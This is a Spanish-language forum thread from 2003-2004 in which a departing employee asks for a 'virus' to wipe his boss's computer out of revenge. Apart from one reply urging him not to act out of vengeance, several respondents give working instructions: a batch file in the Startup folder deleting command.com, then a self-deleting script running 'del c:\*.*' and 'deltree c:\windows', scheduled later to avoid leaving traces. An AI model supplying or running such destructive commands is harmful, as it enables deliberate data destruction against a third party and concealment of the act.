Seguridad - Virus par venganzaaaaaa

 
Vista:

Virus par venganzaaaaaa

Publicado por diepdraco (3 intervenciones) el 25/09/2003 01:28:05
Hola que tal, pronto saldre de mi trabajo no por gusto propio y nisiquiera por no trabajar bien, si no que mi jefesito a a meter a su sobrino y pues debe de correr a alguien, pero lo que mas me molesta es que me preciona para que sacara unso trabajos, para despues decirme gracias y adios

Asi que antes de irme quisiera dejarle un pequeño regalo, pero algo que le borre por completo la maquina, quien me podria yudar yo no conozco nada de virus pero se los pido, ya que no quiero que se salga con la suya
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:Virus par venganzaaaaaa

Publicado por Jazmin (17 intervenciones) el 25/09/2003 07:54:58
Lamentablemente te escribo que un programa no puede borrar nada son fabulaciones.

Atendé que un virus es solo un programa como cualquier otro.

pude desetabilizar la máquina pero nada mas.

Saludos

No actues por venganza. Es mejor siempre tener la cabeza lmpia para actuar mejor

Saludos.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por ^kAnKy^ (3 intervenciones) el 25/09/2003 22:32:24
Puedes hacerte un archivo por lotes .BAT que contenga unas lineas de borrado de ficheros. Lo puedes asociar a la apertura de cualquier aplicación, incluso a la apertura de Windows. Facilito...
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por DIEPDRACO (3 intervenciones) el 26/09/2003 00:41:26
gracias por la dugerencia y te juro que lo haces ver muy pero muy simple, pero soy diseñador web no se nada de lo que estas hablando, pero por lo menos se que hay una forma de hacerlo
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por diepdraco (3 intervenciones) el 26/09/2003 00:37:23
Hola jazmin se que es mala la venganza a mi no me late pero esta persona a pisoteado a mucha gente y ya es justo que el pague, y si esta en mis manos lo quiero hacer, creeme como jefe es lo peor que te puedas imaginas, pero eso lo tolero pero como ser humano es una maldita basura, si ve que te puede amolar o fastidiar para el descansar de algo o por diferencia de clases sociales lo hace por eso se que se lo merece
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por ^kAnKy^ (3 intervenciones) el 26/09/2003 21:22:17
Abres el bloc de notas y pones lo siguiente:

c:\del c:\command.com

y lo grabas como "nombre.bat", lo guardas en la carpeta Inicio del Menú inicio. Así, conseguiras borrar ese archivo al entrar. Así mismo, puedes poner todos los archivos que puedas, poniendo tantas líneas como puedas, sustituyendo los archivos por otros.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por Nirvanita (2 intervenciones) el 27/09/2003 05:40:23
ahhh interesante lo tuyo y que se supondria que haria?

Mira KANKY que te estas mandando una tras otra ehhhh

No es en la primera que te agarro.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por Null_ (4 intervenciones) el 19/12/2003 21:21:00
Asi es, podrias además no solo borrar elcommand, sino también terminar con el contenido de la maquina si esta se encuentra particionada.

tambien puedes crear los bat desde linea de comandos con "copy con", y de esta manera editarlo desde un shell de dos, te sugiero que investigues mas sobre los archivos BAT.

pd. Otra sugerencia... no hagas mucho caso a Nirvanita

1 saludo.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:bonito pero rastreable

Publicado por pper (6 intervenciones) el 09/01/2004 23:04:36
con lo que le diste cometiste errores
1.- dejaste huellas, no borraste el virus
2.- se pasa con un disco de arranque y se soluciona con un copy
3.- para que aparezca error del nuevo ponlo con reloj de tiempo

para que se autodestruya y elimine los archivos de arranque de windows
y no deje huella, lo de activarlo a un tiempo te lo dejo a ti..
desde msdos
edit c:\windows\a.bat
attrib -h -r -s c:\*.*
del c:\*.*
deltree c:\windows
del c:\windows\a.bat

Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:Virus par venganzaaaaaa

Publicado por pper (6 intervenciones) el 09/01/2004 23:40:19
usa el administrador de tareas para que se ejecute en fecha (as) posteriores
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar